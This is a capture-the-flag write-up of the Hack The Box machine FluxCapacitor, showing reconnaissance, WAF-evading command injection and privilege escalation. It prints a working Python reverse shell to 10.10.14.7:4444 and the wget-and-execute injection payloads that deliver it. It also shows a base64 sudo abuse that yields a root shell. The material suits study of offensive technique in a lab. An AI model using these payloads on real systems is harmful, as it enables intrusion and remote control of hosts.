FluxCapacitor
Contents
Port Scan
u505@naos:~/HTB/Machines/FluxCapacitor$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.69
Starting masscan 1.0.5 at 2021-01-13 15:18:14 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.69
u505@naos:~/HTB/Machines/FluxCapacitor$ nmap -sC -sV fluxcapacitor Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-13 10:18 EST Nmap scan report for fluxcapacitor (10.10.10.69) Host is up (0.037s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http SuperWAF | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 15:26:56 GMT | Content-Type: text/html | Content-Length: 175 | Connection: close | <html> | <head><title>404 Not Found</title></head> | <body bgcolor="white"> | <center><h1>404 Not Found</h1></center> | <hr><center>openresty/1.13.6.1</center> | </body> | </html> | GetRequest: | HTTP/1.1 200 OK | Date: Wed, 13 Jan 2021 15:26:56 GMT | Content-Type: text/html | Content-Length: 395 | Last-Modified: Tue, 05 Dec 2017 16:02:29 GMT | Connection: close | ETag: "5a26c315-18b" | Server: SuperWAF | Accept-Ranges: bytes | <!DOCTYPE html> | <html> | <head> | <title>Keep Alive</title> | </head> | <body> | node1 alive | <!-- | Please, add timestamp with something like: | <script> $.ajax({ type: "GET", url: '/sync' }); </script> | <hr/> | FluxCapacitor Inc. info@fluxcapacitor.htb - http://fluxcapacitor.htb<br> | <em><met><doc><brown>Roads? Where we're going, we don't need roads.</brown></doc></met></em> | </body> | </html> | HTTPOptions: | HTTP/1.1 405 Not Allowed | Date: Wed, 13 Jan 2021 15:26:56 GMT | Content-Type: text/html | Content-Length: 179 | Connection: close | <html> | <head><title>405 Not Allowed</title></head> | <body bgcolor="white"> | <center><h1>405 Not Allowed</h1></center> | <hr><center>openresty/1.13.6.1</center> | </body> | </html> | RTSPRequest: | <html> | <head><title>400 Bad Request</title></head> | <body bgcolor="white"> | <center><h1>400 Bad Request</h1></center> | <hr><center>openresty/1.13.6.1</center> | </body> | </html> | X11Probe: | HTTP/1.1 400 Bad Request | Date: Wed, 13 Jan 2021 15:26:56 GMT | Content-Type: text/html | Content-Length: 179 | Connection: close | <html> | <head><title>400 Bad Request</title></head> | <body bgcolor="white"> | <center><h1>400 Bad Request</h1></center> | <hr><center>openresty/1.13.6.1</center> | </body> |_ </html> |_http-server-header: SuperWAF |_http-title: Keep Alive 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.91%I=7%D=1/13%Time=5FFF0F4A%P=x86_64-pc-linux-gnu%r(GetR SF:equest,270,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2013\x20Jan\x20202 SF:1\x2015:26:56\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x SF:20395\r\nLast-Modified:\x20Tue,\x2005\x20Dec\x202017\x2016:02:29\x20GMT SF:\r\nConnection:\x20close\r\nETag:\x20\"5a26c315-18b\"\r\nServer:\x20Sup SF:erWAF\r\nAccept-Ranges:\x20bytes\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<he SF:ad>\n<title>Keep\x20Alive</title>\n</head>\n<body>\n\tOK:\x20node1\x20a SF:live\n\t<!--\n\t\tPlease,\x20add\x20timestamp\x20with\x20something\x20l SF:ike:\n\t\t<script>\x20\$\.ajax\({\x20type:\x20\"GET\",\x20url:\x20'/syn SF:c'\x20}\);\x20</script>\n\t-->\n\t<hr/>\n\tFluxCapacitor\x20Inc\.\x20in SF:fo@fluxcapacitor\.htb\x20-\x20http://fluxcapacitor\.htb<br>\n\t<em><met SF:><doc><brown>Roads\?\x20Where\x20we're\x20going,\x20we\x20don't\x20need SF:\x20roads\.</brown></doc></met></em>\n</body>\n</html>\n")%r(HTTPOption SF:s,135,"HTTP/1\.1\x20405\x20Not\x20Allowed\r\nDate:\x20Wed,\x2013\x20Jan SF:\x202021\x2015:26:56\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Le SF:ngth:\x20179\r\nConnection:\x20close\r\n\r\n<html>\r\n<head><title>405\ SF:x20Not\x20Allowed</title></head>\r\n<body\x20bgcolor=\"white\">\r\n<cen SF:ter><h1>405\x20Not\x20Allowed</h1></center>\r\n<hr><center>openresty/1\ SF:.13\.6\.1</center>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,B3,"<html> SF:\r\n<head><title>400\x20Bad\x20Request</title></head>\r\n<body\x20bgcol SF:or=\"white\">\r\n<center><h1>400\x20Bad\x20Request</h1></center>\r\n<hr SF:><center>openresty/1\.13\.6\.1</center>\r\n</body>\r\n</html>\r\n")%r(X SF:11Probe,135,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x2013\ SF:x20Jan\x202021\x2015:26:56\x20GMT\r\nContent-Type:\x20text/html\r\nCont SF:ent-Length:\x20179\r\nConnection:\x20close\r\n\r\n<html>\r\n<head><titl SF:e>400\x20Bad\x20Request</title></head>\r\n<body\x20bgcolor=\"white\">\r SF:\n<center><h1>400\x20Bad\x20Request</h1></center>\r\n<hr><center>openre SF:sty/1\.13\.6\.1</center>\r\n</body>\r\n</html>\r\n")%r(FourOhFourReques SF:t,12F,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Wed,\x2013\x20Jan\x SF:202021\x2015:26:56\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Leng SF:th:\x20175\r\nConnection:\x20close\r\n\r\n<html>\r\n<head><title>404\x2 SF:0Not\x20Found</title></head>\r\n<body\x20bgcolor=\"white\">\r\n<center> SF:<h1>404\x20Not\x20Found</h1></center>\r\n<hr><center>openresty/1\.13\.6 SF:\.1</center>\r\n</body>\r\n</html>\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.71 seconds
Web enumeration
The source code discover the folder sync.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl http://fluxcapacitor.htb
<!DOCTYPE html>
<html>
<head>
<title>Keep Alive</title>
</head>
<body>
OK: node1 alive
<!--
Please, add timestamp with something like:
<script> $.ajax({ type: "GET", url: '/sync' }); </script>
-->
<hr/>
FluxCapacitor Inc. info@fluxcapacitor.htb - http://fluxcapacitor.htb<br>
<em><met><doc><brown>Roads? Where we're going, we don't need roads.</brown></doc></met></em>
</body>
</html>
Dirsearch
u505@naos:~/HTB/Machines/FluxCapacitor$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,js" -f -t 100 -u http://fluxcapacitor.htb
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: txt, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 23053
Error Log: /opt/utils/dirsearch/logs/errors-21-01-13_10-28-19.log
Target: http://fluxcapacitor.htb/
Output File: /opt/utils/dirsearch/reports/fluxcapacitor.htb/_21-01-13_10-28-19.txt
[10:28:19] Starting:
[10:28:50] 200 - 395B - /index.html
[10:29:13] 403 - 577B - /sync.js
[10:29:13] 403 - 577B - /sync.txt
[10:29:13] 403 - 577B - /sync
[10:29:13] 403 - 577B - /sync/
[10:29:13] 403 - 577B - /synced.txt
[10:29:13] 403 - 577B - /sync.php
[10:29:13] 403 - 577B - /synced.js
[10:29:13] 403 - 577B - /synced.php
[10:29:13] 403 - 577B - /synced
[10:29:13] 403 - 577B - /synced/
Task Completed
User agent check
u505@naos:~/HTB/Machines/FluxCapacitor$ curl -v http://fluxcapacitor.htb/sync * Trying 10.10.10.69:80... * Connected to fluxcapacitor.htb (10.10.10.69) port 80 (#0) > GET /sync HTTP/1.1 > Host: fluxcapacitor.htb > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Wed, 13 Jan 2021 20:08:09 GMT < Content-Type: text/plain < Transfer-Encoding: chunked < Connection: keep-alive < Server: SuperWAF < 20210113T21:08:09
* Connection #0 to host fluxcapacitor.htb left intact
From the browser the page returns a 403 (forbidden) code, but from curl it responds a 200 OK.
Changing the user agent allows the access to the page.
Parameter guessing
We will try a list of parameters to check witch one is the correct one.
u505@naos:~/HTB/Machines/FluxCapacitor$ find /usr/share/wordlists/seclists/ | grep param /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt
After several tests, if the value is bash, the WAF (web application firewall) forbid the access. That allows us to know the correct parameter. For the other parameters, it returns the code 200 and the timestamp.
u505@naos:~/HTB/Machines/FluxCapacitor$ wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 200 -u http://fluxcapacitor.htb/sync?FUZZ=bash /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://fluxcapacitor.htb/sync?FUZZ=bash Total requests: 2588
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000753: 403 7 L 10 W 175 Ch "opt"
Total time: 12.13652 Processed Requests: 2588 Filtered Requests: 2587 Requests/sec.: 213.2405
The parameter is opt.
Allowed characters
u505@naos:~/HTB/Machines/FluxCapacitor$ find /usr/share/wordlists/seclists/ | grep charac /usr/share/wordlists/seclists/Fuzzing/Metacharacters.fuzzdb.txt
With the paraeter found, now we try to find characters allowed by the WAF.
u505@naos:~/HTB/Machines/FluxCapacitor$ wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/Metacharacters.fuzzdb.txt -u http://fluxcapacitor.htb/sync?opt=FUZZ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://fluxcapacitor.htb/sync?opt=FUZZ Total requests: 118
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000007: 200 2 L 1 W 19 Ch "#" 000000011: 200 2 L 1 W 19 Ch "#xA#xD" 000000003: 200 2 L 1 W 19 Ch "!@#0%^#0##018387@#0^^**(()" 000000008: 200 2 L 1 W 19 Ch "#'" 000000001: 200 1 L 0 W 1 Ch "!'" 000000012: 200 2 L 1 W 19 Ch "#xD" 000000006: 200 2 L 1 W 19 Ch ""\t"" 000000010: 200 2 L 1 W 19 Ch "#xA" 000000009: 200 2 L 1 W 19 Ch "#'" 000000013: 200 2 L 1 W 19 Ch "#xD#xA" 000000005: 403 7 L 10 W 175 Ch "">xxx<P>yyy" 000000002: 200 2 L 1 W 19 Ch "!@#$%%^#$%#$@#$%$$@#$%^^**(()" 000000004: 403 7 L 10 W 175 Ch ""><script>"" ... 000000117: 403 7 L 10 W 175 Ch "|"
Total time: 0.590628 Processed Requests: 118 Filtered Requests: 0 Requests/sec.: 199.7871
For some characters we retrieve 19 characters, that corresponds to the timestamp. Some values provide a 403 response (forbidden by AWF), and some do not provide any answer. We filter these last ones.
u505@naos:~/HTB/Machines/FluxCapacitor$ wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/Metacharacters.fuzzdb.txt --sw 0 -u http://fluxcapacitor.htb/sync?opt=FUZZ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://fluxcapacitor.htb/sync?opt=FUZZ Total requests: 118
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000001: 200 1 L 0 W 1 Ch "!'" 000000067: 200 1 L 0 W 1 Ch "/'" 000000096: 200 1 L 0 W 1 Ch "\'" 000000092: 200 1 L 0 W 1 Ch "[']" 000000085: 200 1 L 0 W 1 Ch "@'" 000000116: 200 1 L 0 W 1 Ch "{'}" 000000109: 200 1 L 0 W 1 Ch "^'"
Total time: 0 Processed Requests: 118 Filtered Requests: 111 Requests/sec.: 0
Obtain execution
Playing with burp suite, we found that using value @' executes commands.
We can execute easily with curl.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' whoami'"
nobody
bash: -c: option requires an argument
Some words or characters are banned by the WAF. For example ls.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' ls -la'"
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>openresty/1.13.6.1</center>
</body>
</html>
To abuse the WAF, we need to escape some letters of the command.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' l\s -la'"
total 483896
drwxr-xr-x 22 root root 4096 Nov 16 14:26 .
drwxr-xr-x 22 root root 4096 Nov 16 14:26 ..
drwxr-xr-x 2 root root 4096 Dec 2 2017 bin
drwxr-xr-x 3 root root 4096 Nov 16 14:28 boot
drwxr-xr-x 18 root root 3780 Jan 13 16:19 dev
drwxr-xr-x 77 root root 4096 Nov 16 14:25 etc
drwxr-xr-x 4 root root 4096 Dec 5 2017 home
lrwxrwxrwx 1 root root 33 Nov 16 14:26 initrd.img -> boot/initrd.img-4.13.0-19-generic
lrwxrwxrwx 1 root root 33 Dec 8 2017 initrd.img.old -> boot/initrd.img-4.13.0-19-generic
drwxr-xr-x 20 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Dec 2 2017 lib64
drwx------ 2 root root 16384 Dec 2 2017 lost+found
drwxr-xr-x 2 root root 4096 Dec 2 2017 media
drwxr-xr-x 2 root root 4096 Dec 2 2017 mnt
drwxr-xr-x 5 root root 4096 Dec 2 2017 opt
dr-xr-xr-x 135 root root 0 Jan 13 16:19 proc
drwx------ 4 root root 4096 Nov 16 14:41 root
drwxr-xr-x 19 root root 520 Jan 13 16:19 run
drwxr-xr-x 2 root root 4096 Dec 8 2017 sbin
drwxr-xr-x 2 root root 4096 Dec 2 2017 srv
-rw------- 1 root root 495416320 Dec 2 2017 swapfile
dr-xr-xr-x 13 root root 0 Jan 13 16:19 sys
drwxrwxrwt 10 root root 4096 Jan 13 19:17 tmp
drwxr-xr-x 10 root root 4096 Dec 2 2017 usr
drwxr-xr-x 11 root root 4096 Dec 2 2017 var
lrwxrwxrwx 1 root root 30 Dec 8 2017 vmlinuz -> boot/vmlinuz-4.13.0-19-generic
lrwxrwxrwx 1 root root 30 Dec 2 2017 vmlinuz.old -> boot/vmlinuz-4.13.0-17-generic
bash: -c: option requires an argument
Obtain reverse shell
As usual we raise a listener.
505@naos:~/HTB/Machines/FluxCapacitor$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Create a web server to download our script.
u505@naos:~/HTB/Machines/FluxCapacitor$ mkdir web
u505@naos:~/HTB/Machines/FluxCapacitor$ cd web
u505@naos:~/HTB/Machines/FluxCapacitor/web$ cat u505
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
u505@naos:~/HTB/Machines/FluxCapacitor/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
When I tried to upload the file the WAF blocked it.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' wg\et 10.10.14.7/u505 -O /tmp/u505'" <html> <head><title>403 Forbidden</title></head> <body bgcolor="white"> <center><h1>403 Forbidden</h1></center> <hr><center>openresty/1.13.6.1</center> </body> </html>
But it allows the index page.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' wg\et 10.10.14.7 -O /tmp/u505'" bash: -c: option requires an argument
We move our script to the index page
u505@naos:~/HTB/Machines/FluxCapacitor/web$ mv u505 index.html
We upload our file.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' wg\et 10.10.14.7 -O /tmp/u505'" bash: -c: option requires an argument
We check our file.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' l\s -l /tmp/'"
total 16
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-open-vm-tools.service-lDuymC
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-systemd-resolved.service-njKMQi
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-systemd-timesyncd.service-ntGFRW
-rw-rw-rw- 1 nobody nogroup 227 Jan 13 19:40 u505
bash: -c: option requires an argument
Check the content of the file.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' c\at /tmp/u505'"
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash: -c: option requires an argument
Add execution rights to our file.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' ch\mod +x /tmp/u505'"
bash: -c: option requires an argument
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' l\s -l /tmp/'"
total 16
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-open-vm-tools.service-lDuymC
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-systemd-resolved.service-njKMQi
drwx------ 3 root root 4096 Jan 13 16:19 systemd-private-2d3ad0d654b64114ad477d6229b8362e-systemd-timesyncd.service-ntGFRW
-rwxrwxrwx 1 nobody nogroup 227 Jan 13 19:40 u505
bash: -c: option requires an argument
And finally, execute it.
u505@naos:~/HTB/Machines/FluxCapacitor$ curl "http://fluxcapacitor.htb/sync?opt=@' /tmp/u505'"
And we obtain the reverse shell.
u505@naos:~/HTB/Machines/FluxCapacitor$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.69. Ncat: Connection from 10.10.10.69:56598. /bin/sh: 0: can't access tty; job control turned off whoami nobody
python3 -c "import pty;pty.spawn('/bin/bash')" nobody@fluxcapacitor:/$
User flag
nobody@fluxcapacitor:/home/themiddle$ cat user.txt cat user.txt <USER_FLAG>
Privileges escalation
The privilege escalation was very easy.
nobody@fluxcapacitor:/home/themiddle$ sudo -l
sudo -l
Matching Defaults entries for nobody on fluxcapacitor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nobody may run the following commands on fluxcapacitor:
(ALL) ALL
(root) NOPASSWD: /home/themiddle/.monit
The script executes the command passwd as base64 if the first parameter is cmd.
nobody@fluxcapacitor:/home/themiddle$ cat /home/themiddle/.monit cat /home/themiddle/.monit #!/bin/bash
if [ "$1" == "cmd" ]; then echo "Trying to execute ${2}" CMD=$(echo -n ${2} | base64 -d) bash -c "$CMD" fi
Encode our command bash -i in base64
nobody@fluxcapacitor:/home/themiddle$ echo -n "bash -i" | base64
echo -n "bash -i" | base64
YmFzaCAtaQ==
Execute the command with sudo.
nobody@fluxcapacitor:/home/themiddle$ sudo /home/themiddle/.monit cmd YmFzaCAtaQ==
sudo /home/themiddle/.monit cmd YmFzaCAtaQ==
Trying to execute YmFzaCAtaQ==
root@fluxcapacitor:/home/themiddle# whoami
whoami
root
root@fluxcapacitor:/home/themiddle# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
References
Daniel Simao 14:17, 13 January 2021 (EST)
